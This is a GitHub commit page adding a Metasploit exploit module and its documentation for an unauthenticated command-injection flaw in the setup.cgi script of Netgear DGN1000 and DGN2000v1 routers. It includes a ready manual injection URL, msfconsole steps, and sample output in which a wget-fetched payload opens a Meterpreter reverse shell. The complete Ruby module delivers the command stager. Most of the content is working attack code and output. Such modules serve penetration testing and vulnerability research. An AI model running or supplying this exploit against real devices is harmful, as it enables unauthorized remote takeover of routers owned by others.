-
Notifications
You must be signed in to change notification settings - Fork 13.8k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #9106 negear dgn1000 unauth rce module
- Loading branch information
Showing
2 changed files
with
145 additions
and
0 deletions.
There are no files selected for viewing
51 changes: 51 additions & 0 deletions
51
documentation/modules/exploit/linux/http/netgear_dgn1000_setup_unauth_exec.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,51 @@ | ||
The module netgear_dgn1000_setup_unauth_exec exploits an unauthenticated OS command injection vulnerability in vulnerable Netgear DGN1000 with firmware versions up to `1.1.00.48` in addition to DGN2000v1 models, all firmware versions. The vulnerability occurs in within the `syscmd` fuction of the `setup.cgi` script to execute arbitrary commands. Manual exploitation could be completed through the browser, as for example : `http://<RouterIP>/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=echo+vulnerable&curpath=/¤tsetting.htm=1`. Such example will return "vulnerable" on the page. Vulnerable models have `wget` installed on `/usr/bin/wget` and can be leveraged to drop a MIPS Big Endian payload. | ||
|
||
## Vulnerable Application | ||
|
||
Netgear DGN1000 with firmware versions up to `1.1.00.48` and DGN2000v1 models | ||
|
||
## Verification Steps | ||
|
||
1. Start msfconsole | ||
2. Do : `use exploit/linux/http/netgear_dgn1000_setup_unauth_exec` | ||
3. Do : `set RHOST [RouterIP]` | ||
4. Do : `set PAYLOAD [payload]` | ||
5. Do : `run` | ||
6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session | ||
|
||
## Scenarious | ||
|
||
Sample output of a successfull exploitation should be look like this : | ||
|
||
``` | ||
msf > use exploit/linux/http/netgear_dgn1000_setup_unauth_exec | ||
msf exploit(netgear_dgn1000_setup_unauth_exec) > set RHOST 192.168.0.1 | ||
RHOST => 192.168.0.1 | ||
msf exploit(netgear_dgn1000_setup_unauth_exec) > set RPORT 80 | ||
RPORT => 80 | ||
msf exploit(netgear_dgn1000_setup_unauth_exec) > set LHOST eth0 | ||
LHOST = eth0 | ||
msf exploit(netgear_dgn1000_setup_unauth_exec) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp | ||
PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp | ||
msf exploit(netgear_dgn1000_setup_unauth_exec) > run | ||
[*] Started reverse TCP handler on 192.168.0.11:4444 | ||
[*] 192.168.0.1:80 - Connecting to target... | ||
[*] 192.168.0.1:80 - Exploiting target .... | ||
[*] Using URL: http://0.0.0.0:8080/DnuJhOHYg7auIz | ||
[*] Local IP: http://192.168.0.11:8080/DnuJhOHYg7auIz | ||
[*] Client 192.168.0.1 (Wget) requested /DnuJhOHYg7auIz | ||
[*] Sending payload to 192.168.0.1 (Wget) | ||
[*] Sending stage (1073332 bytes) to 192.168.0.1 | ||
[*] Meterpreter session 2 opened (192.168.0.11:4444 -> 192.168.0.1:51558) at 2017-10-20 20:37:06 -0400 | ||
[*] Command Stager progress - 100.00% done (129/129 bytes) | ||
[*] Server stopped. | ||
meterpreter > sysinfo | ||
Computer : 192.168.0.1 | ||
OS : (Linux 2.6.20-Amazon_SE) | ||
Architecture : mips | ||
Meterpreter : mipsbe/linux | ||
meterpreter > | ||
``` | ||
|
94 changes: 94 additions & 0 deletions
94
modules/exploits/linux/http/netgear_dgn1000_setup_unauth_exec.rb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,94 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Remote | ||
Rank = ExcellentRanking | ||
|
||
include Msf::Exploit::Remote::HttpClient | ||
include Msf::Exploit::CmdStager | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'Netgear DGN1000 Setup.cgi Unauthenticated RCE', | ||
'Description' => %q{ | ||
This module exploits an unauthenticated OS command execution vulneralbility | ||
in the setup.cgi file in Netgear DGN1000 firmware versions up to 1.1.00.48, and | ||
DGN2000v1 models. | ||
}, | ||
'Author' => [ | ||
'Mumbai <https://github.com/realoriginal>', # module | ||
'Robort Palerie <roberto@greyhats.it>' # vuln discovery | ||
], | ||
'References' => [ | ||
['EDB', '25978'], | ||
], | ||
'DisclosureDate' => 'Jun 5 2013', | ||
'License' => MSF_LICENSE, | ||
'Platform' => 'linux', | ||
'Arch' => ARCH_MIPSBE, | ||
'DefaultTarget' => 0, | ||
'DefaultOptions' => { | ||
'PAYLOAD' => 'linux/mipsbe/meterpreter/reverse_tcp' | ||
}, | ||
'Privileged' => true, | ||
'Payload' => { | ||
'DisableNops' => true, | ||
}, | ||
'Targets' => [[ 'Automatic', {} ]], | ||
)) | ||
end | ||
|
||
def check | ||
begin | ||
res = send_request_cgi({ | ||
'uri' => '/setup.cgi', | ||
'method' => 'GET' | ||
}) | ||
if res && res.headers['WWW-Authenticate'] | ||
auth = res.headers['WWW-Authenticate'] | ||
if auth =~ /DGN1000/ | ||
return Exploit::CheckCode::Detected | ||
end | ||
end | ||
rescue ::Rex::ConnectionError | ||
return Exploit::CheckCode::Unknown | ||
end | ||
Exploit::CheckCode::Unknown | ||
end | ||
|
||
def exploit | ||
print_status("#{peer} - Connecting to target...") | ||
|
||
unless check == Exploit::CheckCode::Detected | ||
fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable URL") | ||
end | ||
|
||
print_status("#{peer} - Exploiting target ....") | ||
execute_cmdstager( | ||
:flavor => :wget, | ||
:linemax => 200, | ||
:concat_operator => " && " | ||
) | ||
end | ||
|
||
def execute_command(cmd, opts) | ||
begin | ||
res = send_request_cgi({ | ||
'uri' => '/setup.cgi', | ||
'method' => 'GET', | ||
'vars_get' => { | ||
'next_file' => 'netgear.cfg', | ||
'todo' => 'syscmd', | ||
'cmd' => cmd.to_s, | ||
'curpath' => '/', | ||
'currentsetting.htm' => '1' | ||
} | ||
}) | ||
return res | ||
rescue ::Rex::ConnectionError | ||
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") | ||
end | ||
end | ||
end |